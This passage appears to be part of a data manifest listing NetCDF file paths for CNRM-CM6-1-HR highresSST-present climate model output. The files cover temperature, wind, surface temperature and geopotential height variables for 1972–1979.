'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197605010000-197605312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197606010000-197606302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197607010000-197607312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197608010000-197608312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197609010000-197609302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197610010000-197610312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197611010000-197611302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197612010000-197612312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701010000-197701312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197702010000-197702282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197703010000-197703312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197704010000-197704302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197705010000-197705312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197706010000-197706302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197707010000-197707312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197708010000-197708312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197709010000-197709302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197710010000-197710312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801010000-197801312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197711010000-197711302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197802010000-197802282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197712010000-197712312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197803010000-197803312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197804010000-197804302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197805010000-197805312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197806010000-197806302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197807010000-197807312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197808010000-197808312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197809010000-197809302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197810010000-197810312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197811010000-197811302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197812010000-197812312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901010000-197901312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197902010000-197902282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197903010000-197903312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197904010000-197904302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197905010000-197905312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197906010000-197906302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197907010000-197907312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197908010000-197908312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197909010000-197909302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197910010000-197910312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197911010000-197911302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197912010000-197912312359.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720301-19720331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720701-19720731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720901-19720930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721001-19721031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730101-19730131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730201-19730228.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730301-19730331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730401-19730430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730501-19730531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730601-19730630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730701-19730731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730801-19730831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730901-19730930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731001-19731031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731101-19731130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731201-19731231.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197207010000-197207312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197210010000-197210312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197212010000-197212312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301010000-197301312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197302010000-197302282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197303010000-197303312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197304010000-197304302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197305010000-197305312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197306010000-197306302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197307010000-197307312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197308010000-197308312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197309010000-197309302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197310010000-197310312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197311010000-197311302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197312010000-197312312359.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301-197312.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740101-19741231.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750101-19751231.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760101-19761231.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770101-19771231.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19780101-19781231.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19790101-19791231.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401010000-197401312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197402010000-197402282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197403010000-197403312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197404010000-197404302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197405010000-197405312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197406010000-197406302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197407010000-197407312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197408010000-197408312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197409010000-197409302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197410010000-197410312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197411010000-197411302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197412010000-197412312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601010000-197601312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501010000-197501312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197602010000-197602292359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197502010000-197502282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197503010000-197503312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197603010000-197603312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197604010000-197604302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197504010000-197504302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197605010000-197605312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197505010000-197505312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197606010000-197606302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197506010000-197506302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197607010000-197607312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197507010000-197507312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197608010000-197608312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197508010000-197508312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197609010000-197609302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197509010000-197509302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197610010000-197610312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197510010000-197510312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197611010000-197611302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197511010000-197511302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197612010000-197612312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197512010000-197512312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701010000-197701312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197702010000-197702282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197703010000-197703312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197704010000-197704302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197705010000-197705312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197706010000-197706302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197707010000-197707312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197708010000-197708312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197709010000-197709302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197710010000-197710312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197711010000-197711302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197712010000-197712312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720301-19720331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720401-19720430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720801-19720831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720901-19720930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721101-19721130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730101-19730131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730201-19730228.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801010000-197801312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730301-19730331.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197802010000-197802282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197803010000-197803312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730401-19730430.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197804010000-197804302359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730501-19730531.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197805010000-197805312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197806010000-197806302359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730601-19730630.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197807010000-197807312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730701-19730731.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197808010000-197808312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197809010000-197809302359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730801-19730831.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197810010000-197810312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730901-19730930.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197811010000-197811302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197812010000-197812312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731001-19731031.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901010000-197901312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731101-19731130.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197902010000-197902282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197903010000-197903312359.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731201-19731231.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197904010000-197904302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197905010000-197905312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197906010000-197906302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197907010000-197907312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197908010000-197908312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197909010000-197909302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197910010000-197910312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197911010000-197911302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197912010000-197912312359.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401-197412.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501-197512.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601-197612.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701-197712.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197801-197812.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197901-197912.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760101-19760131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760201-19760229.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760301-19760331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760401-19760430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760501-19760531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740101-19740131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760601-19760630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740201-19740228.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760701-19760731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740301-19740331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760801-19760831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740401-19740430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19760901-19760930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740501-19740531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761001-19761031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740601-19740630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761101-19761130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740701-19740731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19761201-19761231.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740801-19740831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770101-19770131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19740901-19740930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770201-19770228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720201-19720229.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741001-19741031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770301-19770331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720301-19720331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720601-19720630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741101-19741130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770401-19770430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730101-19730131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19741201-19741231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730201-19730228.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770501-19770531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730301-19730331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770601-19770630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750101-19750131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730401-19730430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730501-19730531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770701-19770731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750201-19750228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730601-19730630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730701-19730731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770801-19770831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750301-19750331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730801-19730831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19730901-19730930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19770901-19770930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750401-19750430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731001-19731031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731101-19731130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19771001-19771031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19750501-19750531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19731201-19731231.nc',
